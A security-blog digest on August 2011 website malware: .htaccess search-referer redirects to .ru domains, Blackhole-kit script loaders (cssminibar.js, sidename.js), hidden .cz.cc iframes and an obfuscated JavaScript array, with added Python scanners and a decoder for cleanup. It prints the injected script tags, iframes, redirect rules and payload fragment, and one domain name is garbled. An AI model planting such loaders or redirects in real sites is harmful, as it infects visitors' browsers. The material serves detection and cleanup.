We are often asked which domains are the top distributors of malware, or which threats we see most often with our security scanner. For the month of August things were very similar to the previous months, with a slight increase in the number of WordPress sites compromised through the Timthumb.php vulnerability. If your site [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
Hidden iframes from caiualoy.cz.cc (encoded javascript)
We are seeing many sites hacked with malware getting loaded from caiualoy.cz.cc (and a few other .cz.cc domains). It all starts with a long piece of encoded javascript at the bottom of the sites: **If you don’t want to hear about the technical details of the malware and just want help (or someone to [...]
.htaccess redirections – clearagent.ru
Just an update on the .htaccess redirection attacks we posted about a few days ago. These are some of the new domains being used (especially clearagent.ru): additionalprofit.ru, clearagent.ru, face-apple.ru, fightagent.ru, power-update.ru, syntaxswitch.ru, window-switch.ru. It is happening on WordPress and Joomla sites, but can affect any web site, since they are getting access [...]
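One way to catch this kind of redirect before a visitor reports it, as an added example written for this page and not code from the post: the script below walks an .htaccess and reports every RewriteRule whose target is off-site, together with the HTTP_REFERER / HTTP_USER_AGENT conditions guarding it, which is what keeps the redirect invisible to the site owner while search-engine visitors get sent away. The sample .htaccess is constructed to mirror that pattern (the post does not show the attackers' actual directives); the off-site ErrorDocument check covers a related variant and is an addition here; the site host passed in and the domain list from the post are the only other inputs.

```python
import re
from urllib.parse import urlparse

# Constructed .htaccess (not a file from the page): a normal WordPress block followed
# by the kind of conditional redirect described above, which fires only for visitors
# arriving from a search engine, so the site owner never sees it. Targets use domains
# listed in the post.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.*
RewriteRule ^(.*)$ http://clearagent.ru/in.cgi?3 [R=301,L]
ErrorDocument 404 http://face-apple.ru/
"""

# Domains named in the post above. Any other off-site target is still reported,
# just not marked as known.
KNOWN_BAD = {"additionalprofit.ru", "clearagent.ru", "face-apple.ru", "fightagent.ru",
             "power-update.ru", "syntaxswitch.ru", "window-switch.ru"}

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)
ERRDOC_RE = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(https?://\S+)", re.I)


def scan_htaccess(text, site_host):
    """Report redirects to hosts other than site_host.

    Each finding is (line_no, directive, target_host, known_bad, conditions), where
    conditions are the HTTP_REFERER / HTTP_USER_AGENT tests attached to the rule.
    An off-site RewriteRule guarded by a referer test is the signature of this attack;
    an ErrorDocument pointing off-site is a related variant, reported as well.
    """
    findings = []
    pending = []  # RewriteCond lines waiting for their RewriteRule
    for no, line in enumerate(text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pending.append(f"{m.group(1)} {m.group(2)}")
            continue
        if re.match(r"^\s*RewriteRule\b", line, re.I):
            m = RULE_RE.match(line)
            if m:
                host = (urlparse(m.group(1)).hostname or "").lower()
                if host and host != site_host.lower():
                    findings.append((no, "RewriteRule", host, host in KNOWN_BAD, list(pending)))
            pending = []  # conditions only apply to the RewriteRule that follows them
            continue
        m = ERRDOC_RE.match(line)
        if m:
            host = (urlparse(m.group(1)).hostname or "").lower()
            if host and host != site_host.lower():
                findings.append((no, "ErrorDocument", host, host in KNOWN_BAD, []))
    return findings


if __name__ == "__main__":
    for f in scan_htaccess(SAMPLE_HTACCESS, "example.com"):
        print(f)
```

Run it against every .htaccess under the document root, not just the top-level one: these injections are routinely dropped into subdirectories where nobody looks. A site that legitimately redirects to its own CDN or another domain it owns will show up too, so treat the output as a review list, with the referer-guarded entries at the top.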
Malware injection – /cssminibar.js
We have been tracking the sidename.js malware for a little while, and lately it has changed (mutated) to use a cssminibar.js file instead, still attempting to compromise visitors' browsers in the same way, through the Blackhole exploit kit. This is how the malware looks in a hacked site:
<script type="text/javascript" src="http://amxbans.hmhost.pl/cssminibar.js"></script>
<script type="text/javascript" src="http://livezilla뛒-x.com/sidename.js"></script>
<script type="text/javascript" src="http://kardayim.com/cssminibar.js"></script>
<script type="text/javascript" src="http://www.letfollow.us/sidename.js"></script>
Which does the [...]
Malware injection – /sidename.js
We have been tracking for a few days a large number of sites infected with the el=document.createElement("div"); malware, which tries to compromise the browser of anyone visiting a hacked web site (Blackhole exploit toolkit). We posted about it a few days ago, but recently, instead of dropping the malware into the site, they [...]
Blackhole Exploit Kit (and the .cc domains)
If you are visiting a web site and get a warning from your antivirus about a Blackhole Exploit Kit (type 2021, 2020 and others), it means that the site is currently hacked. If it is your own site, you have to fix it right away to protect yourself and your users from [...]
lavanda.345.pl and noyeenf.cz.cc malicious iframes
For the last few days we have been tracking another large number of hacked sites being infected by malware from lavanda.345.pl, noyeenf.cz.cc and a few other domains in the .pl and .cz.cc name space. This is what it looks like on an infected web site:
<iframe src="http://noyeenf.cz.cc/go/1" width="0" ..
Suspicious conditional redirect. Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users [...]
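Across the sidename.js / cssminibar.js loaders above and the zero-size .cz.cc iframes here, the injected markup has the same shape: a script or iframe whose src points at a host that is not the site's own. The scanner below is an added example, not Sucuri's own tooling or the code from these posts: it walks a page with Python's html.parser and reports external script tags (marking the filenames the posts track) and external iframes that are sized to zero or hidden by style. The page fragment is constructed for the example, and the allow list for legitimate third-party hosts is an assumption a site owner fills in.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page fragment (not taken from any real site): two legitimate script
# includes and a visible, legitimate iframe, then the injected tags shown in the
# posts above: cssminibar.js loaders and a zero-size iframe to a .cz.cc host.
SAMPLE_HTML = """<html><head>
<script type="text/javascript" src="/wp-includes/js/jquery/jquery.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
</head><body>
<p>Welcome</p>
<iframe src="http://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<script type="text/javascript" src="http://amxbans.hmhost.pl/cssminibar.js"></script>
<script type="text/javascript" src="http://kardayim.com/cssminibar.js"></script>
<iframe src="http://noyeenf.cz.cc/go/1" width="0" height="0" frameborder="0"></iframe>
</body></html>"""

KNOWN_FILES = {"sidename.js", "cssminibar.js"}   # filenames the posts above track
FREE_CC_SUFFIXES = (".cz.cc", ".co.cc")          # throwaway .cc namespaces used in these attacks


def _hidden(attrs):
    """True for the zero-size or display:none iframes that injections use."""
    for dim in ("width", "height"):
        if attrs.get(dim, "").strip().rstrip("px") == "0":
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class InjectionScanner(HTMLParser):
    def __init__(self, site_host, allow_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.allow = {h.lower() for h in allow_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        # relative URLs, the site itself and explicitly trusted third parties are not reported
        if not host or host == self.site_host or host in self.allow:
            return
        reasons = []
        if host.endswith(FREE_CC_SUFFIXES):
            reasons.append("free .cc subdomain")
        if tag == "script":
            filename = src.rsplit("/", 1)[-1].split("?")[0]
            if filename in KNOWN_FILES:
                reasons.append("known injected filename")
            if not reasons:
                reasons.append("external script not on allow list")
        elif _hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append({"line": self.getpos()[0], "tag": tag, "host": host,
                                  "src": src, "reasons": reasons})


def scan_html(html, site_host, allow_hosts=()):
    """Return a list of finding dicts for injected-looking script and iframe tags."""
    scanner = InjectionScanner(site_host, allow_hosts)
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "example.com", allow_hosts=["ajax.googleapis.com"]):
        print(f)
```

Visible external iframes (video embeds, widgets) are deliberately not reported; only the hidden ones are, since a legitimate embed has no reason to be zero pixels wide. Run the scanner over the rendered HTML as served, not just the theme files: several of the injections in these posts live in the database or in a PHP include and only appear in the output.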
rioclmac.net and bhykntyg.co.cc hidden iframes
We are getting many requests for information on the following block of code that is showing on quite a few web sites:
var ar="sg]pw1=} [tNrl>hd,C;vB0′bo"aumEA.n)y{c/:fe<(i T”;try{try{qwe()}catch(a){gsdg()};}catch(a){k=new Boolean().toString();};var ar2="f32,32,176,160,180,172,64,100,148,112,116,164,132,40,128, 4,164,40,120,52,164,116,164,132,40,0,84,140,184,108, 4,44,108,116,164,172,92,96,100,64,140,92,136,36….
If you are seeing this on your web site, it is malware and it needs to be cleaned. It is basically a block of javascript [...]
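The sample above can be decoded from what is visible: dividing each number in ar2 by 4 gives an index into the ar string, and the first 44 values spell out the beginning of the hidden script. The decoder below is an added example, not the post's analysis and not the malware's own routine. The index-times-4 relation is inferred here from the sample rather than stated by the post; the two curly quotes the page shows inside ar (′ and ”) are assumed to be an ASCII apostrophe and double quote mangled in extraction; and the page snippet used to exercise the extractor is constructed, with those quotes backslash-escaped as the JavaScript would require.

```python
import re

# Key string and the beginning of the numeric array as shown in the excerpt above.
# The excerpt's curly ′ and ” inside the key are read as an ASCII apostrophe and
# double quote mangled by page extraction: an assumption made here.
KEY = "sg]pw1=} [tNrl>hd,C;vB0'bo\"aumEA.n)y{c/:fe<(i T\""
AR2 = ("f32,32,176,160,180,172,64,100,148,112,116,164,132,40,128,"
       "4,164,40,120,52,164,116,164,132,40,0,84,140,184,108,"
       "4,44,108,116,164,172,92,96,100,64,140,92,136,36")

# Constructed snippet in the shape the injected block takes inside a page: the key
# with its quotes backslash-escaped, the try/catch noise seen in the excerpt, then
# the array. Not copied from a real site.
SAMPLE_PAGE = ('<script>var ar="sg]pw1=} [tNrl>hd,C;vB0\'bo\\"aumEA.n)y{c/:fe<(i T\\"";'
               'try{try{qwe()}catch(a){gsdg()};}catch(a){k=new Boolean().toString();};'
               'var ar2="' + AR2 + '";</script>')

JS_STR = r'"((?:[^"\\]|\\.)*)"'   # a double-quoted JavaScript string literal, escapes allowed


def extract_pair(js):
    """Pull the (key, array) pair out of page text. Returns None if either is missing."""
    m_key = re.search(r'var\s+ar\s*=\s*' + JS_STR, js)
    m_arr = re.search(r'var\s+ar2\s*=\s*' + JS_STR, js)
    if not (m_key and m_arr):
        return None
    key = re.sub(r'\\(.)', r'\1', m_key.group(1))   # undo JavaScript backslash escapes
    return key, m_arr.group(1)


def decode(key, ar2):
    """Recover the hidden script: every number in ar2, divided by 4, indexes into key.

    That relation is inferred here from the visible sample (it yields readable
    JavaScript); the post does not state it. A value that is not a multiple of 4,
    or that indexes past the key, means the pair is not this variant, so fail
    loudly instead of emitting garbage.
    """
    out = []
    for tok in re.findall(r"\d+", ar2):      # also skips the stray leading 'f'
        n = int(tok)
        if n % 4 or n // 4 >= len(key):
            raise ValueError(f"{n} does not fit a 4*index scheme for a {len(key)}-char key")
        out.append(key[n // 4])
    return "".join(out)


if __name__ == "__main__":
    pair = extract_pair(SAMPLE_PAGE)
    # Only the first 44 values are visible above, so this prints a prefix of the payload.
    print(decode(*pair))
```

On the visible prefix this yields "  if (document.getElementsByTagName('body')[", the start of the usual routine that waits for the body element and then appends the hidden iframe to it. When cleaning a site, decode the full array from the actual file before removing it: the decoded output tells you which domain the iframe points at, which is what you need for blocking and for checking the other sites on the same server.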